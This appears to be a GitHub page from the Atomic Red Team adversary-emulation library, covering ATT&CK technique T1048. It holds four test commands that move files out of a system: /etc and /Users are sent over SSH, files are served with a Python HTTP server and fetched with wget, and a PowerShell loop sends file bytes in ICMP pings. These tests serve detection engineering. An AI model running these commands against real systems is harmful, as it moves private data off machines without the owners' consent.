Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
2 contributors

Users who have contributed to this file

@mikajarvinen @MHaggis
104 lines (68 sloc) 3.47 KB

T1048 - Exfiltration Over Alternative Protocol

Description from ATT&CK

Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.

Atomic Tests


Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH

Input a domain and test Exfiltration over SSH

Remote to Local

Supported Platforms: macOS, CentOS, Ubuntu, Linux

Inputs

Name Description Type Default Value
domain target SSH domain url target.example.com
user_name username for domain string atomic
password password for user string atomic

Run it with sh!

ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz


Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH

Input a domain and test Exfiltration over SSH

Local to Remote

Supported Platforms: macOS, CentOS, Ubuntu, Linux

Inputs

Name Description Type Default Value
domain target SSH domain url target.example.com
user_name username for domain string atomic
password password for user string atomic

Run it with sh!

tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'


Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP

A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.

Supported Platforms: macOS, CentOS, Ubuntu, Linux

Run it with these steps!

  1. Victim System Configuration:

    mkdir /tmp/victim-staging-area echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt

  2. Using Python to establish a one-line HTTP server on victim system:

    cd /tmp/victim-staging-area python -m SimpleHTTPServer 1337

  3. To retrieve the data from an adversary system:

    wget http://VICTIM_IP:1337/victim-file.txt



Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP

Exfiltration of specified file over ICMP protocol.

Supported Platforms: Windows

Inputs

Name Description Type Default Value
input_file Path to file to be exfiltrated. Path C:\Windows\System32\notepad.exe
ip_address Destination IP address where the data should be sent. String 1.1.1.1

Run it with powershell!

$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }

You can’t perform that action at this time.